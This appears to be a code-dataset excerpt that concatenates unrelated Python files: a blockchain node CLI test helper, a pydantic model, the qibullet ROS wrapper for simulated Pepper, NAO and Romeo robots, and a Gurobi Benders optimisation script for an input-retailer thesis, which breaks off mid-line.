def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
class TestNodeCLI():
"""Interface to rpicoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with rpicoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run rpicoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same rpicoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running bitcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except JSONDecodeError:
return cli_stdout.rstrip("\n")
| 38.557491 | 248 | 0.627688 |
4f543ec6a11d443c275af232d3a2ebe38b8a5ed2 | 485 | py | Python | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | 1 | 2021-06-09T14:01:52.000Z | 2021-06-09T14:01:52.000Z | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | null | null | null | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | null | null | null | import uuid
from pydantic import BaseModel, Field
class ProjectModel(BaseModel):
id: str = Field(default_factory=uuid.uuid4, alias="_id")
name: str = Field(...)
nickname: str = Field(...)
class Config:
allow_population_by_field_name = True
schema_extra = {
"example": {
"id": "00010203-0405-0607-0809-0a0b0c0d0e0f",
"name": "News of the World",
"nickname": "notw",
}
}
| 24.25 | 61 | 0.548454 |
ebcbc10af7bfa0bf9db50b8d2fd34052ef120ff3 | 28,739 | py | Python | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
try:
import rospy
import roslib
import roslaunch
import tf2_ros
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from sensor_msgs.msg import JointState
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
from std_msgs.msg import Empty
from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
from geometry_msgs.msg import TransformStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
try:
from naoqi_bridge_msgs.msg import PoseStampedWithSpeed as MovetoPose
OFFICIAL_DRIVER = False
print("Using softbankrobotics-research forked version of NAOqi driver")
except ImportError as e:
from geometry_msgs.msg import PoseStamped as MovetoPose
OFFICIAL_DRIVER = True
MISSING_IMPORT = None
except ImportError as e:
MISSING_IMPORT = str(e)
class RosWrapper:
"""
Virtual class defining the basis of a robot ROS wrapper
"""
def __init__(self):
"""
Constructor
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.spin_thread = None
self._wrapper_termination = False
self.image_bridge = CvBridge()
self.roslauncher = None
self.transform_broadcaster = tf2_ros.TransformBroadcaster()
atexit.register(self.stopWrapper)
def stopWrapper(self):
"""
Stops the ROS wrapper
"""
self._wrapper_termination = True
try:
assert self.spin_thread is not None
assert isinstance(self.spin_thread, Thread)
assert self.spin_thread.isAlive()
self.spin_thread.join()
except AssertionError:
pass
if self.roslauncher is not None:
self.roslauncher.stop()
print("Stopping roslauncher")
def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
"""
Launches the ROS wrapper
Parameters:
virtual_robot - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.robot = virtual_robot
self.ros_namespace = ros_namespace
self.frequency = frequency
rospy.init_node(
"qibullet_wrapper",
anonymous=True,
disable_signals=False)
# Upload the robot description to the ros parameter server
try:
if isinstance(self.robot, PepperVirtual):
robot_name = "pepper"
elif isinstance(self.robot, NaoVirtual):
robot_name = "nao"
elif isinstance(self.robot, RomeoVirtual):
robot_name = "romeo"
else:
raise pybullet.error(
"Unknown robot type, wont set robot description")
package_path = roslib.packages.get_pkg_dir("naoqi_driver")
urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"
with open(urdf_path, 'r') as file:
robot_description = file.read()
rospy.set_param("/robot_description", robot_description)
except IOError as e:
raise pybullet.error(
"Could not retrieve robot descrition: " + str(e))
# Launch the robot state publisher
robot_state_publisher = roslaunch.core.Node(
"robot_state_publisher",
"robot_state_publisher")
self.roslauncher = roslaunch.scriptapi.ROSLaunch()
self.roslauncher.start()
self.roslauncher.launch(robot_state_publisher)
# Initialize the ROS publisher and subscribers
self._initPublishers()
self._initSubscribers()
# Launch the wrapper's main loop
self._wrapper_termination = False
self.spin_thread = Thread(target=self._spin)
self.spin_thread.start()
def _initPublishers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS publishers
"""
raise NotImplementedError
def _initSubscribers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS subscribers
"""
raise NotImplementedError
def _spin(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Designed to emulate a ROS spin method
"""
raise NotImplementedError
def _broadcastOdometry(self, odometry_publisher):
"""
INTERNAL METHOD, computes an odometry message based on the robot's
position, and broadcast it
Parameters:
odometry_publisher - The ROS publisher for the odometry message
"""
# Send Transform odom
x, y, theta = self.robot.getPosition()
odom_trans = TransformStamped()
odom_trans.header.frame_id = "odom"
odom_trans.child_frame_id = "base_link"
odom_trans.header.stamp = rospy.get_rostime()
odom_trans.transform.translation.x = x
odom_trans.transform.translation.y = y
odom_trans.transform.translation.z = 0
quaternion = pybullet.getQuaternionFromEuler([0, 0, theta])
odom_trans.transform.rotation.x = quaternion[0]
odom_trans.transform.rotation.y = quaternion[1]
odom_trans.transform.rotation.z = quaternion[2]
odom_trans.transform.rotation.w = quaternion[3]
self.transform_broadcaster.sendTransform(odom_trans)
# Set up the odometry
odom = Odometry()
odom.header.stamp = rospy.get_rostime()
odom.header.frame_id = "odom"
odom.pose.pose.position.x = x
odom.pose.pose.position.y = y
odom.pose.pose.position.z = 0.0
odom.pose.pose.orientation = odom_trans.transform.rotation
odom.child_frame_id = "base_link"
[vx, vy, vz], [wx, wy, wz] = pybullet.getBaseVelocity(
self.robot.getRobotModel(),
self.robot.getPhysicsClientId())
odom.twist.twist.linear.x = vx
odom.twist.twist.linear.y = vy
odom.twist.twist.angular.z = wz
odometry_publisher.publish(odom)
def _broadcastCamera(self, camera, image_publisher, info_publisher):
"""
INTERNAL METHOD, computes the image message and the info message of the
given camera and publishes them into the ROS framework
Parameters:
camera - The camera used for broadcasting
image_publisher - The ROS publisher for the Image message,
corresponding to the image delivered by the active camera
info_publisher - The ROS publisher for the CameraInfo message,
corresponding to the parameters of the active camera
"""
try:
frame = camera.getFrame()
assert frame is not None
# Fill the camera info message
info_msg = CameraInfo()
info_msg.distortion_model = "plumb_bob"
info_msg.header.frame_id = camera.getCameraLink().getName()
info_msg.width = camera.getResolution().width
info_msg.height = camera.getResolution().height
info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
info_msg.K = camera._getCameraIntrinsics()
info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
info_msg.P = list(info_msg.K)
info_msg.P.insert(3, 0.0)
info_msg.P.insert(7, 0.0)
info_msg.P.append(0.0)
# Fill the image message
image_msg = self.image_bridge.cv2_to_imgmsg(frame)
image_msg.header.frame_id = camera.getCameraLink().getName()
# Check if the retrieved image is RGB or a depth image
if isinstance(camera, CameraDepth):
image_msg.encoding = "16UC1"
else:
image_msg.encoding = "bgr8"
# Publish the image and the camera info
image_publisher.publish(image_msg)
info_publisher.publish(info_msg)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints
extra_joints - A dict, describing extra joints to be published. The
dict should respect the following syntax:
{"joint_name": joint_value, ...}
"""
msg_joint_state = JointState()
msg_joint_state.header = Header()
msg_joint_state.header.stamp = rospy.get_rostime()
msg_joint_state.name = list(self.robot.joint_dict)
msg_joint_state.position = self.robot.getAnglesPosition(
msg_joint_state.name)
try:
assert isinstance(extra_joints, dict)
for name, value in extra_joints.items():
msg_joint_state.name += [name]
msg_joint_state.position += [value]
except AssertionError:
pass
joint_state_publisher.publish(msg_joint_state)
def _jointAnglesCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/joint_angles topic
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::JointAnglesWithSpeed. That type can be found in
the ros naoqi software stack
"""
joint_list = msg.joint_names
position_list = list(msg.joint_angles)
# If the "non official" driver (softbankrobotics-research fork) is
# used, will try to detect if multiple speeds have been provided. If
# not, or if the "official" driver is used, the speed attribute of the
# message will be used
try:
assert not OFFICIAL_DRIVER
if len(msg.speeds) != 0:
velocity = list(msg.speeds)
else:
velocity = msg.speed
except AssertionError:
velocity = msg.speed
self.robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Nao, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_nao instance
Parameters:
virtual_nao - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_nao,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP],
self.front_cam_pub,
self.front_info_pub)
if self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM],
self.bottom_cam_pub,
self.bottom_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Romeo, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_romeo instance
Parameters:
virtual_romeo - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_romeo,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.right_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/image_raw',
Image,
queue_size=10)
self.right_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/camera_info',
CameraInfo,
queue_size=10)
self.left_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/image_raw',
Image,
queue_size=10)
self.left_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT],
self.right_cam_pub,
self.right_info_pub)
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT],
self.left_cam_pub,
self.left_info_pub)
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH],
self.depth_cam_pub,
self.depth_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Pepper, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_pepper instance
Parameters:
virtual_pepper - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_pepper,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.laser_pub = rospy.Publisher(
self.ros_namespace + "/laser",
LaserScan,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'/naoqi_driver/odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
rospy.Subscriber(
'/cmd_vel',
Twist,
self._velocityCallback)
rospy.Subscriber(
'/move_base_simple/goal',
MovetoPose,
self._moveToCallback)
rospy.Subscriber(
'/move_base_simple/cancel',
Empty,
self._killMoveCallback)
def _broadcastLasers(self, laser_publisher):
"""
INTERNAL METHOD, publishes the laser values in the ROS framework
Parameters:
laser_publisher - The ROS publisher for the LaserScan message,
corresponding to the laser info of the pepper robot (for API
consistency)
"""
if not self.robot.laser_manager.isActive():
return
scan = LaserScan()
scan.header.stamp = rospy.get_rostime()
scan.header.frame_id = "base_footprint"
# -120 degres, 120 degres
scan.angle_min = -2.0944
scan.angle_max = 2.0944
# 240 degres FoV, 61 points (blind zones inc)
scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)
# Detection ranges for the lasers in meters, 0.1 to 3.0 meters
scan.range_min = 0.1
scan.range_max = 3.0
# Fill the lasers information
right_scan = self.robot.getRightLaserValue()
front_scan = self.robot.getFrontLaserValue()
left_scan = self.robot.getLeftLaserValue()
if isinstance(right_scan, list):
scan.ranges.extend(list(reversed(right_scan)))
scan.ranges.extend([-1]*8)
if isinstance(front_scan, list):
scan.ranges.extend(list(reversed(front_scan)))
scan.ranges.extend([-1]*8)
if isinstance(left_scan, list):
scan.ranges.extend(list(reversed(left_scan)))
laser_publisher.publish(scan)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP],
self.front_cam_pub,
self.front_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM],
self.bottom_cam_pub,
self.bottom_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH],
self.depth_cam_pub,
self.depth_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(
self,
joint_state_publisher,
extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})
def _velocityCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/cmd_vel topic
Parameters:
msg - a ROS message containing a Twist command
"""
self.robot.move(msg.linear.x, msg.linear.y, msg.angular.z)
def _moveToCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/goal' topic. It allows to move the robot's base
Parameters:
msg - a ROS message containing a pose stamped with a speed, or a
simple pose stamped (depending on which version of the naoqi_driver
is used, the "official" one from ros-naoqi or the "non official"
softbankrobotics-research fork). The type of the message is the
following: geometry_msgs::PoseStamped for the "official",
naoqi_bridge_msgs::PoseStampedWithSpeed for the "non-official".
An alias is given to the message type: MovetoPose
"""
if OFFICIAL_DRIVER:
pose = msg.pose
frame = 0
frame_id = msg.header.frame_id
speed = None
else:
pose = msg.pose_stamped.pose
frame = msg.referenceFrame
frame_id = msg.pose_stamped.header.frame_id
speed = msg.speed_percentage *\
PepperBaseController.MAX_LINEAR_VELOCITY +\
PepperBaseController.MIN_LINEAR_VELOCITY
try:
assert frame not in [
PepperVirtual.FRAME_ROBOT,
PepperVirtual.FRAME_WORLD]
if frame_id == "odom":
frame = PepperVirtual.FRAME_WORLD
elif frame_id == "base_footprint":
frame = PepperVirtual.FRAME_ROBOT
else:
raise pybullet.error(
"Incorrect reference frame for move_base_simple, please "
"modify the content of your message")
except AssertionError:
pass
x = pose.position.x
y = pose.position.y
theta = pybullet.getEulerFromQuaternion([
pose.orientation.x,
pose.orientation.y,
pose.orientation.z,
pose.orientation.w])[-1]
self.robot.moveTo(
x,
y,
theta,
frame=frame,
speed=speed,
_async=True)
def _killMoveCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/cancel' topic. This callback is used to stop the
robot's base from moving
Parameters:
msg - an empty ROS message, with the Empty type
"""
self.robot.moveTo(0, 0, 0, _async=True)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastLasers(self.laser_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
| 33.495338 | 79 | 0.604196 |
e00abe973d4ee5f4776ffc9372e5d6c5b7c9e293 | 16,419 | py | Python | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | 2 | 2019-02-27T01:25:51.000Z | 2020-12-21T07:57:32.000Z | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | null | null | null | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | 1 | 2021-03-02T07:53:42.000Z | 2021-03-02T07:53:42.000Z | from gurobipy import *
import numpy as np
# scenarioss = [sc1,sc2,sc3,sc4,sc5,sc6,sc7,sc8,sc9,sc10,sc11,sc12]
# for i in scenarioss:
from sc1 import inputBlock, upperPriceBlock, upperPriceForward, priceBlock, costBlock, PricePool, Aconstant
###################################################################################
#Sets
#Hours
t, h1 = multidict({"1": [1],"2": [1],"3": [1],"4": [1],"5": [1]})
#Scenarios
omega, sc = multidict({'1': [1],'2': [1],'3': [1],'4': [1],'5': [1],'6': [1],'7': [1],'8': [1],'9': [1],'10': [1],'11': [1],'12': [1]})
#Blocks in the price-quota curves
i, bl1 = multidict({1: [1], 2: [1],3: [1]})
#Forwards
f, fr = multidict({"Forward 1": [1], "Forward 2": [1]})
#input blocks in forward contracts
j, pb = multidict({"Bajo": [1],"Moderado": [1],"Alto": [1]})
#Clients
l, client = multidict({"Pequeno": [1],"Mediano": [1]})
#Parameters
#targeted profit z_0s
targetedProfit = 1.5
#probability of scenario omega
scenarioProb = {
('1'): 0.083, ('2'): 0.065, ('3'): 0.10, ('4'): 0.20, ('5'): 0.06, ('6'): 0.20, ('7'): 0.10, ('8'): 0.08, ('9'): 0.15, ('10'): 0.18, ('11'): 0.20, ('12'): 0.20}
##################################################################################
#Model
m = Model("complete")
master = Model("Master")
auxiliar = Model("Auxiliar")
#Variables definition
#cost of purchasing from forward contracts in each period omega
costF = auxiliar.addVars(t, name ="cost forward", vtype= GRB.CONTINUOUS)
#net cost of trading in the pool in period t and scenario omega
costP = auxiliar.addVars(t, omega, name = "cost pool", vtype= GRB.CONTINUOUS)
#input purchased from contract f
inputTotalF = auxiliar.addVars(f, name="input from forward contract", vtype= GRB.CONTINUOUS)
#input purchased from the jth block of the forward contracting curve belonging to contract f
inputBlockF = auxiliar.addVars(f, j, obj = 1, name="input from block from forward contract", vtype= GRB.CONTINUOUS)
#input supplied by the retailer to farmer group l in the period t and scenario omega
inputR = auxiliar.addVars(l, t, omega, name="input supplied by the retailer", vtype= GRB.CONTINUOUS)
#input traded in the pool in the period t and scenario omega
inputP = auxiliar.addVars(t, omega, name="input traded in the pool", vtype= GRB.CONTINUOUS)
#selling price settled by the retailer for farmer group l
gammaSellingR = auxiliar.addVars(l, name="price settled by the retailer", vtype= GRB.CONTINUOUS)
#price of the ith interval of the price-quota curve for farmer gruop l
gammaPriceR = auxiliar.addVars(l, i, name ="price of the interval of price-quota curve ", vtype= GRB.CONTINUOUS)
#revenue obtained by the retailer from selling to farmer group l in period t and scenario omega
INR = auxiliar.addVars(l,t,omega, name = "revenue obtained ", vtype= GRB.CONTINUOUS)
#binary variable selling price offered by the retailer to cliente group l belongs to block i of the price-quota curve
A = master.addVars(l,i, name="selling price offered by the retailer to farmer group", vtype=GRB.BINARY)
#Auxiliar variable who storages the profit by scenario
foAux = auxiliar.addVars(omega, name ="Auxiliar variable who storages the profit by scenario - Auxiliar", vtype = GRB.CONTINUOUS)
#Auxiliar variable who storages the profit by scenario
foMaster = master.addVars(omega, name ="Auxiliar variable who storages the profit by scenario - Master", vtype = GRB.CONTINUOUS)
#compute the risk for scenario
riskScenario = master.addVars(omega, name ="risk for scenario", vtype= GRB.CONTINUOUS)
#k(w) is an auxiliary binary variable and equal to 0 of profit(w) > z0 and 1 if profit(w) <= z0
k = master.addVars(omega, name="auxiliary binary variable 2 for calculate risk", vtype = GRB.BINARY)
#risk for scenario in auxiliar problem
dr = auxiliar.addVars(omega, name= "downside risk in auxiliar problem", vtype = GRB.CONTINUOUS)
#EDR for scenario
EDRS = auxiliar.addVars(omega, name="EDR for scenario", vtype = GRB.CONTINUOUS)
#EDR for function objective
EDRZ = []
#zlower for optimality cut
zlower = 1 #master.addVars(name="min value for optimality cut", vtype = GRB.CONTINUOUS)
master.update()
auxiliar.update()
#save the objective function for each model
ofAux = {}
ofMaster = {}
it = 1
##################################################################################
#Constrains for the master problem
#2. The cost of purchasing input through the forward contracts.
def constraint2(priceBlock):
ctr2 = {}
for hour in t:
ctr2[hour] = auxiliar.addConstr(costF[hour] == (quicksum(inputBlockF[frw,pwb] * priceBlock[frw,pwb] for frw in f for pwb in j))) #need to changue the sumatory for pwb in j to for pwb in Nj
auxiliar.update()
#3. The input purchased in each block is non-negative and bounded by an upper limit.
def constraint3(upperPriceForward):
ctr3a = {}
for pwb in j:
for frw in f:
ctr3a[pwb,frw] = auxiliar.addConstr(inputBlockF[frw,pwb] >= 0)
auxiliar.update()
ctr3b = {}
for pwb in j:
for frw in f:
ctr3a[pwb,frw] = auxiliar.addConstr(inputBlockF[frw,pwb] <= upperPriceForward[frw,pwb])
auxiliar.update()
#4. The input purchased for each contract is the sum of the input purchased in each block
def constraint4():
ctr4 = {}
for frw in f:
ctr4[frw] = auxiliar.addConstr(inputTotalF[frw] == quicksum(inputBlockF[frw,pwb] for pwb in j))
auxiliar.update()
#The price-quota curve for each farmer group in each period and scenario can be formulated as follows:
#5. Pool related
def constraint5(PricePool):
ctr5 = {}
for hour in t:
for sc in omega:
ctr5[hour,sc] = auxiliar.addConstr(costP[hour,sc] == PricePool[hour,sc]*inputP[hour,sc])
auxiliar.update()
#7.A[l,i] is a set of binary variables that identify the interval of the price-quota curve corresponding to the selling price cRl
def constraint7():
ctr7 = {}
for client in l:
ctr7[client] = auxiliar.addConstr(gammaSellingR[client] == quicksum(gammaPriceR[client,bg] for bg in i)) #need to changue the sumatory
auxiliar.update()
#11. The revenue obtained from selling input to the farmers is calculated from the following expression. Employment of a stepwise price-quota curve allows expressing the revenue as a linear constraint
def constraint11(inputBlock):
ctr11 = {}
for hour in t:
for client in l:
for sc in omega:
ctr11[hour,client,sc] = auxiliar.addConstr(INR[client,hour,sc]
